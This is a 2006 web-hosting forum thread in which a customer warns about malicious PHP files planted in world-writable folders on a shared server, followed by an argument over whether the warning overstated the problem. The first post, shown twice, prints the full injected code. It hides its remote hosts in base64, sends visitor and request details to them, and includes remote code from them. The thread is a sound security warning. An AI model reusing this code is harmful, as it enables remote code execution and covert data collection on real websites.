Server exploit -- Pass 40

clayhenry · May 16th, 2006, 10:58 AM

Hello,

I already submited this to Surapss security.

There is a mayor problem with server security. All folders with write permissions (777) have malicious PHP code in them.

Usually they are called contact.php, download.php and other.

It consists of this code:

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_en code($b).".".base64_encode($c).".".base64_encode($ d).".".base64_encode($e).".".base64_encode($f)."." .base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_dec ode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_deco de("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

The base64 encodes values are as follows:

"aHR0cDovLw==" is "http://"
"dXNlcjUucGhwc3VwcG9ydC5ydQ
"dXNlcjUucGhwc3VwcG9ydC5ydQ

Those files are in EVERY folder with 777 permission.

You can read about it in-depth here:
http://forums.asmallorange.com/lofiv...php/t5815.html

This DOES effect Surpass accounts.

Check your folders!!

vexcity.com
pass40

**David** · May 16th, 2006, 4:24 PM

You should calm down. Just because this was on your site doesn't mean that ALL SERVERS AND FOLDERS WITH 777 have been affected. If a newer user looks and it's not there, they may freak out because they don't see it and think something worse is going on. Mass panicing everyone because this showed up on your site isn't a good idea. In fact, it's more likely that your site had insecurities in it to allow this, or the server you are only had an insecurity in one of the site's it's hosting which allowed this. This does not mean the whole data center is compromised or broken.

After reading that link, I didn't see anything in there saying that there was a hole in the server, but several saying it was likely the software...including the first post.

clayhenry · May 16th, 2006, 5:13 PM

Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.

This in regards to PASS40.

What I meant was, if one folder is affected, all of them will be affected with that premission.
There are common scripts that require that permission.

Next time, I will defiantly think twice before posting a warning that will affect users.

You’re right; ignorance is bliss...carry on.

**Kayla** · May 16th, 2006, 5:23 PM

Clay,

Soon Pass40 will have phpsuexec, as newer servers do.

**Rai** · May 16th, 2006, 6:16 PM

Quote:

Originally Posted by clayhenry

Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.

This in regards to PASS40.

What I meant was, if one folder is affected, all of them will be affected with that premission.
There are common scripts that require that permission.

Next time, I will defiantly think twice before posting a warning that will affect users.

You’re right; ignorance is bliss...carry on.

We appreciate you offering a warning to all users, but next time ensure that you clearly specify what server you are talking about (preferably in the title of the post), since there are more than a few at Surpass. If I were to guess, I'd think you were talking about Pass5, since that's the server you have listed in your profile... I completely missed your reference to Pass40 in your first post. Just be clear so that people can't misinterpret what you're trying to say.

I can't wait for phpsuexec to finally get around to all servers... though, I'll admit, I only started actually understanding it about 2 nights ago.

clayhenry · May 16th, 2006, 6:26 PM

My apologies, I do realized that I missed to emphasis what server I was on and was speeking off.
The title should have been a good place to put it.

This is the first time I hear of this phpsuexec.

**Geoff** · May 16th, 2006, 6:27 PM

Quote:

Originally Posted by clayhenry

Please tell me where I mentioned "ALL SERVERS AND FOLDERS "?

I don’t see myself mentioning ALL SERVERS AND FOLDERS.

Not to be picky, but anyone reading your first will get the impression that you did say that. For one you explicitly stated ALL FOLDERS, and then said it affects Surpass accounts, which doesnt restrict your statement to just one server, it implies many, or most, or all, are "affected".

Quote:

All folders with write permissions (777) have malicious PHP code in them.

Quote:

This DOES effect Surpass accounts.

clayhenry · May 16th, 2006, 6:43 PM

It's interesting how people on this forum choose to criticize the how the message was formulated then what it carries.

Yes, it does affect all folders on the affected account.

Yes, it does effect surpass accounts. It effected most of mine, and its not do to my error. Some scripts require 777 in order to function.

But please, go ahead pick apart at what I say.

Its funny how my first thought of warning other users have bean thrown back in my face.

I will defiantly keep that kind of stuff to my self. Lesson leaned.

My apologies If I have thrown you in to panic.

**Geoff** · May 16th, 2006, 6:52 PM

lol im not the least bit worried about this "problem"

But what i have a problem with is you stating something, and then denying it in the exact same thread. You stated it, and then when someone asks you not to get people worried by telling them they are all vulnerable, you deny saying it. Yet its in writing at the top of the thread.

May 16th, 2006, 10:58 AM	#1 (permalink)
clayhenry Registered User Seasoned Poster Joined in Apr 2004 Lives in edmonton, ab Hosted on pass5 84 posts Gave thanks: 0 Thanked 0 times	Server exploit -- Pass 40 Hello, I already submited this to Surapss security. There is a mayor problem with server security. All folders with write permissions (777) have malicious PHP code in them. Usually they are called contact.php, download.php and other. It consists of this code: <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_en code($b).".".base64_encode($c).".".base64_encode($ d).".".base64_encode($e).".".base64_encode($f)."." .base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_dec ode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_deco de("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?> The base64 encodes values are as follows: "aHR0cDovLw==" is "http://" "dXNlcjUucGhwc3VwcG9ydC5ydQ "dXNlcjUucGhwc3VwcG9ydC5ydQ Those files are in EVERY folder with 777 permission. You can read about it in-depth here: http://forums.asmallorange.com/lofiv...php/t5815.html This DOES effect Surpass accounts. Check your folders!! vexcity.com pass40 Last edited by clayhenry; May 16th, 2006 at 10:59 AM..

May 16th, 2006, 4:24 PM	#2 (permalink)
David is surrounded by retards. Resident. Joined in Mar 2004 Lives in fear of Obama. Hosted on Pass 7 13,082 posts Gave thanks: 8 Thanked 33 times	You should calm down. Just because this was on your site doesn't mean that ALL SERVERS AND FOLDERS WITH 777 have been affected. If a newer user looks and it's not there, they may freak out because they don't see it and think something worse is going on. Mass panicing everyone because this showed up on your site isn't a good idea. In fact, it's more likely that your site had insecurities in it to allow this, or the server you are only had an insecurity in one of the site's it's hosting which allowed this. This does not mean the whole data center is compromised or broken. After reading that link, I didn't see anything in there saying that there was a hole in the server, but several saying it was likely the software...including the first post. __________________

May 16th, 2006, 5:13 PM	#3 (permalink)
clayhenry Registered User Seasoned Poster Joined in Apr 2004 Lives in edmonton, ab Hosted on pass5 84 posts Gave thanks: 0 Thanked 0 times	Please tell me where I mentioned "ALL SERVERS AND FOLDERS "? I don’t see myself mentioning ALL SERVERS AND FOLDERS. This in regards to PASS40. What I meant was, if one folder is affected, all of them will be affected with that premission. There are common scripts that require that permission. Next time, I will defiantly think twice before posting a warning that will affect users. You’re right; ignorance is bliss...carry on. Last edited by clayhenry; May 16th, 2006 at 5:23 PM..

May 16th, 2006, 5:23 PM	#4 (permalink)
Kayla Marketing Maven Surpass Staff Joined in May 2003 Lives in Orlando 24,749 posts Gave thanks: 946 Thanked 806 times	Clay, Soon Pass40 will have phpsuexec, as newer servers do. __________________ Follow Surpass on Twitter and Facebook Check out the Surpass Blog

May 16th, 2006, 6:26 PM	#6 (permalink)
clayhenry Registered User Seasoned Poster Joined in Apr 2004 Lives in edmonton, ab Hosted on pass5 84 posts Gave thanks: 0 Thanked 0 times	My apologies, I do realized that I missed to emphasis what server I was on and was speeking off. The title should have been a good place to put it. This is the first time I hear of this phpsuexec. Last edited by clayhenry; May 16th, 2006 at 6:27 PM..

May 16th, 2006, 6:43 PM	#8 (permalink)
clayhenry Registered User Seasoned Poster Joined in Apr 2004 Lives in edmonton, ab Hosted on pass5 84 posts Gave thanks: 0 Thanked 0 times	It's interesting how people on this forum choose to criticize the how the message was formulated then what it carries. Yes, it does affect all folders on the affected account. Yes, it does effect surpass accounts. It effected most of mine, and its not do to my error. Some scripts require 777 in order to function. But please, go ahead pick apart at what I say. Its funny how my first thought of warning other users have bean thrown back in my face. I will defiantly keep that kind of stuff to my self. Lesson leaned. My apologies If I have thrown you in to panic. Last edited by clayhenry; May 16th, 2006 at 6:49 PM..

May 16th, 2006, 6:52 PM	#9 (permalink)
Geoff Yabadabadoo Super #1 Joined in Nov 2004 Lives in B.C., Canada Hosted on Dedicated 1,013 posts Gave thanks: 7 Thanked 28 times	lol im not the least bit worried about this "problem" But what i have a problem with is you stating something, and then denying it in the exact same thread. You stated it, and then when someone asks you not to get people worried by telling them they are all vulnerable, you deny saying it. Yet its in writing at the top of the thread. __________________ Geoff Ellis - Surpass Dedicated Server Customer www.adepttechs.net

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)

Thread Tools	Search this Thread
Show Printable Version Email this Page	Search this Thread: Advanced Search